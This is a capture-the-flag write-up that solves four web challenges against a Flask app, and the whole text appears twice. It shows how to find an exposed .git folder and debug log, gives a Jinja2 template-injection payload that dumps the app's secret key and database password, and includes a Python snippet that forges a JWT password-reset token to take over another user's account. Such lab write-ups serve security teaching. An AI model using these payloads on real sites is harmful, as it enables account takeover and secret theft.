ricardojba/0xOPOSEC 0x70 Challenge

## 0xOPOSEC 0x70 Challenge
-- challenge 1:
From the name of the challenge it was a dead giveway that there was a .git folder exposed.

Then just find out where the git repo is hosted:
curl http://0x70.apl3b.com/.git/config

And get the repo hosting service:
https://gitlab.com/DDuarte/twipy.git

Finally check all the commits and on this one at the bottom of the page you can read a flag:
https://gitlab.com/DDuarte/twipy/commit/508cc297eb2d5412a5f994e87a27b43ffbf033a4

{flag}Us3_vault_for_no_p4sswords_1n_s0urce_cod3.

-- challenge 2:
Just use dirsearch.py
or
search the repo for the word "debug". Again the hint from the challenge name helped here:
https://gitlab.com/search?utf8=%E2%9C%93&snippets=&scope=&search=debug&project_id=10269530

Get the file from the website and read the flag on the error messages:
http://0x70.apl3b.com/debug.log

{flag}b3_c4r3ful_w1th_Wh4t_y0u_l34v3_pUbl1c

-- challenge 3:
Vulnerability: Server Side Template Injection (SSTI) jinja2/Flask
Some references:
https://ctftime.org/writeup/10895
https://eugenekolo.com/blog/hitcon-ctf-2016-writeups/
https://hackerone.com/reports/125980

Register a user on the website http://0x70.apl3b.com and create a private post with: {{config}}
Hint: don't use your real email --> OPSEC (un)safe debug.log ;)

You just posted: <Config {'JSON_AS_ASCII': True, 'BOOTSTRAP_LOCAL_SUBDOMAIN': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAIL_USERNAME': 'twipytwipy77@gmail.com', 'SQLALCHEMY_POOL_RECYCLE': None, 'SQLALCHEMY_ECHO': "False", 'SQLALCHEMY_TRACK_MODIFICATIONS': "False", 'SQLALCHEMY_POOL_TIMEOUT': None, 'SQLALCHEMY_RECORD_QUERIES': None, 'SESSION_COOKIE_DOMAIN': "False", 'SESSION_COOKIE_NAME': 'session', 'MAX_COOKIE_SIZE': 4093, 'BOOTSTRAP_QUERYSTRING_REVVING': True, 'MAIL_SERVER': 'smtp.gmail.com', 'SQLALCHEMY_NATIVE_UNICODE': None, 'MAX_CONTENT_LENGTH': None, 'MAIL_USE_TLS': "False", 'ELASTICSEARCH_URL': 'el:9200', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'SQLALCHEMY_POOL_SIZE': None, 'SQLALCHEMY_MAX_OVERFLOW': None, 'ADMINS': ['twipytwipy77@gmail.com'], 'TRAP_HTTP_EXCEPTIONS': "False", 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_COOKIE_PATH': None, 'BOOTSTRAP_SERVE_LOCAL': "False", 'SESSION_COOKIE_SAMESITE': None, 'SECRET_KEY': 'yJmsCAeao5zOM3gvoxHrOyM5HGJTTDpQ7UxAIHneCxc=', 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'PREFERRED_URL_SCHEME': 'http', 'TESTING': "False", 'TEMPLATES_AUTO_RELOAD': None, 'JSONIFY_MIMETYPE': 'application/json', 'MAIL_USE_SSL': True, 'USE_X_SENDFILE': "False", 'SQLALCHEMY_DATABASE_URI': 'mysql+pymysql://twipy:RkZDwtkaZ9ugnwf@db/twipy', 'SESSION_COOKIE_SECURE': "False", 'POSTS_PER_PAGE': 8, 'BOOTSTRAP_USE_MINIFIED': True, 'SQLALCHEMY_BINDS': None, 'FLAG': '{flag}V4lid4t3_always_us3r_1NPUT', 'ENV': 'production', 'DEBUG': "False", 'SQLALCHEMY_COMMIT_ON_TEARDOWN': "False", 'EXPLAIN_TEMPLATE_LOADING': "False", 'MAIL_PASSWORD': None, 'JSONIFY_PRETTYPRINT_REGULAR': "False", 'BOOTSTRAP_CDN_FORCE_SSL': "False", 'PROPAGATE_EXCEPTIONS': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'MAIL_PORT': 465}>

{flag}V4lid4t3_always_us3r_1NPUT

-- challenge 4:
Reset Willis password by forging the reset password token since we extracted the SECRET_KEY value from the app.

Get the password reset token format
https://gitlab.com/DDuarte/twipy/blob/master/app/models.py#L111

Get Willis email
https://gitlab.com/DDuarte/twipy/blob/master/twipy.py#L14

Get the UUID of the user Willis:
http://0x70.apl3b.com/explore?page=25

Generate the password reset token:
pyenv global 2.7.15
pip install PyJWT
python

import jwt
import base64
from time import time
token = jwt.encode({'id': '70a82737-a6d9-4284-93db-0600db6f05ca', 'name': 'Willis Adams', 'email': 'willis.adams@example.com', 'exp': time() + 600},base64.b64decode('yJmsCAeao5zOM3gvoxHrOyM5HGJTTDpQ7UxAIHneCxc='),algorithm='HS256').decode('utf-8')
print(token)
quit()

Reset Willis password URL:
http://0x70.apl3b.com/auth/reset_password/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6IndpbGxpcy5hZGFtc0BleGFtcGxlLmNvbSIsImlkIjoiNzBhODI3MzctYTZkOS00Mjg0LTkzZGItMDYwMGRiNmYwNWNhIiwiZXhwIjoxNTQ3NzM1NjA0LjIzODk3MSwibmFtZSI6IldpbGxpcyBBZGFtcyJ9.wm73GeCyWRR2aCE_xXtsVkDnjiwVbput62sVe_V3JW0

See the user Willis second private post

{flag}4lw4ys_v3r1fy_y0ur_t0k3NS
	-- challenge 1:
	From the name of the challenge it was a dead giveway that there was a .git folder exposed.

	Then just find out where the git repo is hosted:
	curl http://0x70.apl3b.com/.git/config

	And get the repo hosting service:
	https://gitlab.com/DDuarte/twipy.git

	Finally check all the commits and on this one at the bottom of the page you can read a flag:
	https://gitlab.com/DDuarte/twipy/commit/508cc297eb2d5412a5f994e87a27b43ffbf033a4

	{flag}Us3_vault_for_no_p4sswords_1n_s0urce_cod3.

	-- challenge 2:
	Just use dirsearch.py
	or
	search the repo for the word "debug". Again the hint from the challenge name helped here:
	https://gitlab.com/search?utf8=%E2%9C%93&snippets=&scope=&search=debug&project_id=10269530

	Get the file from the website and read the flag on the error messages:
	http://0x70.apl3b.com/debug.log

	{flag}b3_c4r3ful_w1th_Wh4t_y0u_l34v3_pUbl1c

	-- challenge 3:
	Vulnerability: Server Side Template Injection (SSTI) jinja2/Flask
	Some references:
	https://ctftime.org/writeup/10895
	https://eugenekolo.com/blog/hitcon-ctf-2016-writeups/
	https://hackerone.com/reports/125980

	Register a user on the website http://0x70.apl3b.com and create a private post with: {{config}}
	Hint: don't use your real email --> OPSEC (un)safe debug.log ;)

	You just posted: <Config {'JSON_AS_ASCII': True, 'BOOTSTRAP_LOCAL_SUBDOMAIN': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAIL_USERNAME': 'twipytwipy77@gmail.com', 'SQLALCHEMY_POOL_RECYCLE': None, 'SQLALCHEMY_ECHO': "False", 'SQLALCHEMY_TRACK_MODIFICATIONS': "False", 'SQLALCHEMY_POOL_TIMEOUT': None, 'SQLALCHEMY_RECORD_QUERIES': None, 'SESSION_COOKIE_DOMAIN': "False", 'SESSION_COOKIE_NAME': 'session', 'MAX_COOKIE_SIZE': 4093, 'BOOTSTRAP_QUERYSTRING_REVVING': True, 'MAIL_SERVER': 'smtp.gmail.com', 'SQLALCHEMY_NATIVE_UNICODE': None, 'MAX_CONTENT_LENGTH': None, 'MAIL_USE_TLS': "False", 'ELASTICSEARCH_URL': 'el:9200', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'SQLALCHEMY_POOL_SIZE': None, 'SQLALCHEMY_MAX_OVERFLOW': None, 'ADMINS': ['twipytwipy77@gmail.com'], 'TRAP_HTTP_EXCEPTIONS': "False", 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_COOKIE_PATH': None, 'BOOTSTRAP_SERVE_LOCAL': "False", 'SESSION_COOKIE_SAMESITE': None, 'SECRET_KEY': 'yJmsCAeao5zOM3gvoxHrOyM5HGJTTDpQ7UxAIHneCxc=', 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'PREFERRED_URL_SCHEME': 'http', 'TESTING': "False", 'TEMPLATES_AUTO_RELOAD': None, 'JSONIFY_MIMETYPE': 'application/json', 'MAIL_USE_SSL': True, 'USE_X_SENDFILE': "False", 'SQLALCHEMY_DATABASE_URI': 'mysql+pymysql://twipy:RkZDwtkaZ9ugnwf@db/twipy', 'SESSION_COOKIE_SECURE': "False", 'POSTS_PER_PAGE': 8, 'BOOTSTRAP_USE_MINIFIED': True, 'SQLALCHEMY_BINDS': None, 'FLAG': '{flag}V4lid4t3_always_us3r_1NPUT', 'ENV': 'production', 'DEBUG': "False", 'SQLALCHEMY_COMMIT_ON_TEARDOWN': "False", 'EXPLAIN_TEMPLATE_LOADING': "False", 'MAIL_PASSWORD': None, 'JSONIFY_PRETTYPRINT_REGULAR': "False", 'BOOTSTRAP_CDN_FORCE_SSL': "False", 'PROPAGATE_EXCEPTIONS': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'MAIL_PORT': 465}>

	{flag}V4lid4t3_always_us3r_1NPUT

	-- challenge 4:
	Reset Willis password by forging the reset password token since we extracted the SECRET_KEY value from the app.

	Get the password reset token format
	https://gitlab.com/DDuarte/twipy/blob/master/app/models.py#L111

	Get Willis email
	https://gitlab.com/DDuarte/twipy/blob/master/twipy.py#L14

	Get the UUID of the user Willis:
	http://0x70.apl3b.com/explore?page=25

	Generate the password reset token:
	pyenv global 2.7.15
	pip install PyJWT
	python

	import jwt
	import base64
	from time import time
	token = jwt.encode({'id': '70a82737-a6d9-4284-93db-0600db6f05ca', 'name': 'Willis Adams', 'email': 'willis.adams@example.com', 'exp': time() + 600},base64.b64decode('yJmsCAeao5zOM3gvoxHrOyM5HGJTTDpQ7UxAIHneCxc='),algorithm='HS256').decode('utf-8')
	print(token)
	quit()

	Reset Willis password URL:
	http://0x70.apl3b.com/auth/reset_password/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6IndpbGxpcy5hZGFtc0BleGFtcGxlLmNvbSIsImlkIjoiNzBhODI3MzctYTZkOS00Mjg0LTkzZGItMDYwMGRiNmYwNWNhIiwiZXhwIjoxNTQ3NzM1NjA0LjIzODk3MSwibmFtZSI6IldpbGxpcyBBZGFtcyJ9.wm73GeCyWRR2aCE_xXtsVkDnjiwVbput62sVe_V3JW0

	See the user Willis second private post

	{flag}4lw4ys_v3r1fy_y0ur_t0k3NS